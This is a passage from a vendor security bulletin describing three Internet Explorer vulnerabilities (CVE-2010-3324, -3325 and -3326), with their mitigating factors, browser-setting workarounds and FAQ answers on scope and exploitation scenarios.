Vulnerabilities and Exposures list, see CVE-2010-3324.\r\n\t\r\nMitigating Factors for HTML Sanitization Vulnerability - CVE-2010-3324\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See the FAQ subsection of this vulnerability section for more information about Internet Explorer Enhanced Security Configuration.\r\n\u2022\t\r\n\r\nOnly Web sites that is using toStaticHTML may potentially be affected.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for HTML Sanitization Vulnerability - CVE-2010-3324\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nRead e-mails in plain text\r\n\r\nTo help protect yourself from the e-mail attack vector, read e-mail messages in plain text format.\r\n\r\nMicrosoft Office Outlook 2002 users who have applied Office XP Service Pack 1 or a later version and Microsoft Office Outlook Express 6 users who have applied Internet Explorer 6 Service Pack 1 or a later version can enable this setting and view e-mail messages that are not digitally signed or e-mail messages that are not encrypted in plain text only.\r\n\r\nDigitally signed e-mail messages or encrypted e-mail messages are not affected by the setting and may be read in their original formats. For more information about how to enable this setting in Outlook 2002, see Microsoft Knowledge Base Article 307594.\r\n\r\nFor information about this setting in Outlook Express 6, see Microsoft Knowledge Base Article 291387.\r\n\r\nImpact of workaround. E-mail messages that are viewed in plain text format will not contain pictures, specialized fonts, animations, or other rich content. Additionally:\r\n\u2022\t\r\n\r\nThe changes are applied to the preview pane and to open messages.\r\n\u2022\t\r\n\r\nPictures become attachments so that they are not lost.\r\n\u2022\t\r\n\r\nBecause the message is still in Rich Text or HTML format in the store, the object model (custom code solutions) may behave unexpectedly.\r\n\u2022\t\r\n\r\nSet Internet and Local intranet security zone settings to "High" to block ActiveX Controls and Active Scripting in these zones\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings for the Internet security zone to block ActiveX controls and Active Scripting. You can do this by setting your browser security to High.\r\n\r\nTo raise the browsing security level in Internet Explorer, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nOn the Internet Explorer Tools menu, click Internet Options.\r\n\r\n2.\r\n\t\r\n\r\nIn the Internet Options dialog box, click the Security tab, and then click the Internet icon.\r\n\r\n3.\r\n\t\r\n\r\nUnder Security level for this zone, move the slider to High. This sets the security level for all Web sites you visit to High.\r\n\r\nNote If no slider is visible, click Default Level, and then move the slider to High.\r\n\r\nNote Setting the level to High may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly even with the security setting set to High.\r\n\r\nImpact of workaround. There are side effects to blocking ActiveX Controls and Active Scripting. Many Web sites that are on the Internet or on an intranet use ActiveX or Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use ActiveX Controls to provide menus, ordering forms, or even account statements. Blocking ActiveX Controls or Active Scripting is a global setting that affects all Internet and intranet sites. If you do not want to block ActiveX Controls or Active Scripting for such sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to block ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect yourself from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\n\u2022\t\r\n\r\nConfigure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone. To do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Internet Options on the Tools menu.\r\n\r\n2.\r\n\t\r\n\r\nClick the Security tab.\r\n\r\n3.\r\n\t\r\n\r\nClick Internet, and then click Custom Level.\r\n\r\n4.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n5.\r\n\t\r\n\r\nClick Local intranet, and then click Custom Level.\r\n\r\n6.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n7.\r\n\t\r\n\r\nClick OK two times to return to Internet Explorer.\r\n\r\nNote Disabling Active Scripting in the Internet and Local intranet security zones may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly.\r\n\r\nImpact of workaround. There are side effects to prompting before running Active Scripting. Many Web sites that are on the Internet or on an intranet use Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use Active Scripting to provide menus, ordering forms, or even account statements. Prompting before running Active Scripting is a global setting that affects all Internet and intranet sites. You will be prompted frequently when you enable this workaround. For each prompt, if you feel you trust the site that you are visiting, click Yes to run Active Scripting. If you do not want to be prompted for all these sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to require a prompt before it runs ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect you from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for HTML Sanitization Vulnerability - CVE-2010-3324\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is an information disclosure vulnerability. An attacker who exploited the vulnerability when a user views a Web page that uses the toStaticHTML API may execute a cross-site scripting attack on the user.\r\n\r\nWhat causes the vulnerability? \r\nThe vulnerability exists in the way that Internet Explorer handles content using specific strings when sanitizing HTML.\r\n\r\nWhat is the toStaticHTML API? \r\nThe toStaticHTML API can be used to remove event attributes and script from user input before display as HTML. For more information, please see the MSDN Library article, toStaticHTML Method.\r\n\r\nIs this vulnerability related to CVE-2010-3324 in MS10-072, Vulnerabilities in toStaticHTML Could Allow Information Disclosure? \r\nYes, the HTML Sanitization Vulnerability, CVE-2010-3324, also affects Microsoft SharePoint.\r\n\r\nAre both updates necessary to be installed to be protected from the vulnerability? \r\nNo, each update addresses a separate application. Only the update that corresponds with software running on your system needs to be applied.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability, when a user is viewing HTML on a Web site that has not been properly sanitized by Internet Explorer, could execute script in the user's security context against the site.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nTo exploit this vulnerability, an attacker must have the ability to submit a specially crafted script to a target site. Due to the vulnerability, in specific situations the specially crafted script is not properly sanitized using toStaticHTML, and subsequently this could lead to attacker-supplied script being run in the security context of a user who views the malicious content on the Web site.\r\n\r\nFor cross-site scripting attacks, this vulnerability requires that a user be visiting a compromised Web site for any malicious action to occur. For instance, after an attacker has successfully submitted specially crafted script to the target site, any Web page on that site that contains the specially crafted script is a potential vector for persistent cross-site scripting attacks. When a user visits a Web page that contains the specially crafted script, the script could be run in the security context of the user on the site.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nThis vulnerability requires that a user be logged on and visiting a Web site for any malicious action to occur. Therefore, any systems where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by modifying the way that Internet Explorer handles HTML sanitization using toStaticHTML.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CVE-2010-3324.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nCSS Special Character Information Disclosure Vulnerability - CVE-2010-3325\r\n\r\nAn information disclosure vulnerability exists in the way that Internet Explorer processes CSS special characters. An attacker could exploit the vulnerability by constructing a specially crafted Web page that could allow information disclosure if a user viewed the Web page. An attacker who successfully exploited this vulnerability could view content from another domain or Internet Explorer zone.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3325.\r\n\t\r\nMitigating Factors for CSS Special Character Information Disclosure Vulnerability - CVE-2010-3325\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation.\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker's Web site.\r\n\u2022\t\r\n\r\nBy default, all supported versions of Microsoft Outlook, Microsoft Outlook Express, and Windows Mail open HTML e-mail messages in the Restricted sites zone, which disables script and ActiveX controls, removing the risk of an attacker being able to use this vulnerability to execute malicious code. If a user clicks a link in an e-mail message, the user could still be vulnerable to exploitation of this vulnerability through the Web-based attack scenario.\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See the FAQ subsection of this vulnerability section for more information about Internet Explorer Enhanced Security Configuration.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for CSS Special Character Information Disclosure Vulnerability - CVE-2010-3325\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nSet Internet and Local intranet security zone settings to "High" to block ActiveX Controls and Active Scripting in these zones\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings for the Internet security zone to block ActiveX controls and Active Scripting. You can do this by setting your browser security to High.\r\n\r\nTo raise the browsing security level in Internet Explorer, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nOn the Internet Explorer Tools menu, click Internet Options.\r\n\r\n2.\r\n\t\r\n\r\nIn the Internet Options dialog box, click the Security tab, and then click the Internet icon.\r\n\r\n3.\r\n\t\r\n\r\nUnder Security level for this zone, move the slider to High. This sets the security level for all Web sites you visit to High.\r\n\r\nNote If no slider is visible, click Default Level, and then move the slider to High.\r\n\r\nNote Setting the level to High may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly even with the security setting set to High.\r\n\r\nImpact of workaround. There are side effects to blocking ActiveX Controls and Active Scripting. Many Web sites that are on the Internet or on an intranet use ActiveX or Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use ActiveX Controls to provide menus, ordering forms, or even account statements. Blocking ActiveX Controls or Active Scripting is a global setting that affects all Internet and intranet sites. If you do not want to block ActiveX Controls or Active Scripting for such sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to block ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect yourself from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\n\u2022\t\r\n\r\nConfigure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone. To do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Internet Options on the Tools menu.\r\n\r\n2.\r\n\t\r\n\r\nClick the Security tab.\r\n\r\n3.\r\n\t\r\n\r\nClick Internet, and then click Custom Level.\r\n\r\n4.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n5.\r\n\t\r\n\r\nClick Local intranet, and then click Custom Level.\r\n\r\n6.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n7.\r\n\t\r\n\r\nClick OK two times to return to Internet Explorer.\r\n\r\nNote Disabling Active Scripting in the Internet and Local intranet security zones may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly.\r\n\r\nImpact of workaround. There are side effects to prompting before running Active Scripting. Many Web sites that are on the Internet or on an intranet use Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use Active Scripting to provide menus, ordering forms, or even account statements. Prompting before running Active Scripting is a global setting that affects all Internet and intranet sites. You will be prompted frequently when you enable this workaround. For each prompt, if you feel you trust the site that you are visiting, click Yes to run Active Scripting. If you do not want to be prompted for all these sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to require a prompt before it runs ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect you from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for CSS Special Character Information Disclosure Vulnerability - CVE-2010-3325\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is an information disclosure vulnerability. An attacker who exploited the vulnerability when a user views a Web page could view content from another domain or Internet Explorer zone other than the domain or zone of the attacker's Web page.\r\n\r\nWhat causes the vulnerability? \r\nInternet Explorer improperly processes CSS special characters, potentially allowing disclosure of sensitive data.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could view content from another domain or Internet Explorer zone.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could host a specially crafted Web site that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the Web site. The attacker could also take advantage of compromised Web sites and Web sites that accept or host user-provided content or advertisements. These Web sites could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or in an Instant Messenger message that takes users to the attacker's Web site. It could also be possible to display specially crafted Web content by using banner advertisements or by using other methods to deliver Web content to affected systems.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nThis vulnerability requires that a user be logged on and visiting a Web site for any malicious action to occur. Therefore, any systems where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability.\r\n\r\nI am running Internet Explorer for Windows Server 2003 or Windows Server 2008. Does this mitigate this vulnerability? \r\nYes. By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. Enhanced Security Configuration is a group of preconfigured settings in Internet Explorer that can reduce the likelihood of a user or administrator downloading and running specially crafted Web content on a server. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See also Managing Internet Explorer Enhanced Security Configuration.\r\n\r\nWhat does the update do? \r\nThis update addresses the vulnerability by modifying the way that Internet Explorer handles CSS special characters.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CVE-2010-3325.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nUninitialized Memory Corruption Vulnerability - CVE-2010-3326\r\n\r\nA remote code execution vulnerability exists in the way that Internet Explorer accesses an object that has not been correctly initialized or has been deleted. An attacker could exploit the vulnerability by constructing a specially crafted Web page. When a user views the Web page, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3326.\r\n\t\r\nMitigating Factors for Uninitialized Memory Corruption Vulnerability - CVE-2010-3326\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker's Web site.\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nBy default, all supported versions of Microsoft Outlook, Microsoft Outlook Express, and Windows Mail open HTML e-mail messages in the Restricted sites zone, which disables script and ActiveX controls, removing the risk of an attacker being able to use this vulnerability to execute malicious code. If a user clicks a link in an e-mail message, the user could still be vulnerable to exploitation of this vulnerability through the Web-based attack scenario.\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See the FAQ subsection of this vulnerability section for more information about Internet Explorer Enhanced Security Configuration.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Uninitialized Memory Corruption Vulnerability - CVE-2010-3326\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nSet Internet and Local intranet security zone settings to "High" to block ActiveX Controls and Active Scripting in these zones\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings for the Internet security zone to block ActiveX controls and Active Scripting. You can do this by setting your browser security to High.\r\n\r\nTo raise the browsing security level in Internet Explorer, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nOn the Internet Explorer Tools menu, click Internet Options.\r\n\r\n2.\r\n\t\r\n\r\nIn the Internet Options dialog box, click the Security tab, and then click the Internet icon.\r\n\r\n3.\r\n\t\r\n\r\nUnder Security level for this zone, move the slider to High. This sets the security level for all Web sites you visit to High.\r\n\r\nNote If no slider is visible, click Default Level, and then move the slider to High.\r\n\r\nNote Setting the level to High may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly even with the security setting set to High.\r\n\r\nImpact of workaround. There are side effects to blocking ActiveX Controls and Active Scripting. Many Web sites that are on the Internet or on an intranet use ActiveX or Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use ActiveX Controls to provide menus, ordering forms, or even account statements. Blocking ActiveX Controls or Active Scripting is a global setting that affects all Internet and intranet sites. If you do not want to block ActiveX Controls or Active Scripting for such sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to block ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect yourself from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\n\u2022\t\r\n\r\nConfigure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone. To do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Internet Options on the Tools menu.\r\n\r\n2.\r\n\t\r\n\r\nClick the Security tab.\r\n\r\n3.\r\n\t\r\n\r\nClick Internet, and then click Custom Level.\r\n\r\n4.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n5.\r\n\t\r\n\r\nClick Local intranet, and then click Custom Level.\r\n\r\n6.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n7.\r\n\t\r\n\r\nClick OK two times to return to Internet Explorer.\r\n\r\nNote Disabling Active Scripting in the Internet and Local intranet security zones may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly.\r\n\r\nImpact of workaround. There are side effects to prompting before running Active Scripting. Many Web sites that are on the Internet or on an intranet use Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use Active Scripting to provide menus, ordering forms, or even account statements. Prompting before running Active Scripting is a global setting that affects all Internet and intranet sites. You will be prompted frequently when you enable this workaround. For each prompt, if you feel you trust the site that you are visiting, click Yes to run Active Scripting. If you do not want to be prompted for all these sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to require a prompt before it runs ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect you from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Uninitialized Memory Corruption Vulnerability - CVE-2010-3326\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nWhat causes the vulnerability? \r\nWhen Internet Explorer attempts to access an object that has not been initialized or has been deleted, it may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as a logged-on user. If the user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could host a specially crafted Web site that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the Web site. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised Web sites and Web sites that accept or host user-provided content or advertisements. These Web sites could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by clicking a link in an e-mail message or in an Instant Messenger message that takes users to the attacker's Web site, or by opening an attachment sent through e-mail.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nThis vulnerability requires that a user be logged on and visiting a Web site for any malicious action to occur. Therefore, any systems where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability.\r\n\r\nI am running Internet Explorer for Windows Server 2003 or Windows Server 2008. Does this mitigate this vulnerability? \r\nYes. By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as 